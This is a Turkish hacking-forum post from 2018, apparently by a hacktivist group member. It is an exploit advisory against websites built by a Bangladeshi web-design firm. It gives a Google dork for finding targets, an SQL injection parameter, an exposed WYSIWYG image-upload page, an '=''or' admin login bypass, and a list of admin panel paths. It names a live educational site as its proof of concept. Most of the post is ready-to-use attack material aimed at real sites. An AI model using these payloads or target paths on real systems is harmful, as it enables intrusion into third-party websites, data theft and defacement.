Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Developed by OneTech Web Design BD Multiple Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,386 / 1,386
Deneyim: 44 / 100
Rep Sayısı: 2873
Mesaj Sayısı: 6503
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Developed by OneTech Web Design BD Multiple Vuln
04.09.2018 04:49
################################################################################​#################

# Exploit Title : Developed by OneTech Web Design Bangladesh Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/09/2018
# Vendor Homepage : onetechbd.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
+ CWE-592 - Authentication Bypass Issues

################################################################################​#################

# Google Dork : intext:''Developed by: OneTech''

inurl:/allindex.php?page=teacher

Developed by OneTech Bangladesh SQL Injection Vulnerability

# Exploit : /news_details.php?iid=[SQL Injection]

OpenWYSIWYG Image Manager =>

Insert Image Exploit => /admin-mb/script/popups/insert_image.html?wysiwyg=textdetails

Developed by OneTech Bangladesh Admin Login Bypass Authentication Vulnerability

# Admin Control Panel Path => /admin-mb/login.php

# Exploit =>

Username : '=''or'
Password : '=''or'

# Useable Admin Control Panel Path URL Links =>

/admin-mb/add_tatt.php
/admin-mb/add_satt.php
/admin-mb/manage_s.php
/admin-mb/manage_notice.php
/admin-mb/manageart.php
/admin-mb/manage_stdu.php
/admin-mb/manage_text.php
/admin-mb/magteacher.php
/admin-mb/manage_commit.php
/admin-mb/manage_download.php
/admin-mb/manage_photo.php
/admin-mb/manage_result.php
/admin-mb/manage_presult.php
/admin-mb/manage_subject.php
/admin-mb/manage_class.php
/admin-mb/add_admin.php
/admin-mb/manage_admin.php

################################################################################​#################

# Example Site => sujkss.edu.bd/news_details.php?iid=17%27 => [ Proof of Concept ] => archive.is/jzJjL

# SQL Database Error =>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''17''' at line 1

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################
(Bu konu en son: 04.09.2018 Tarihinde, Saat: 04:49 düzenlenmiştir. Düzenleyen: KingSkrupellos.)

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti



1 Ziyaretçi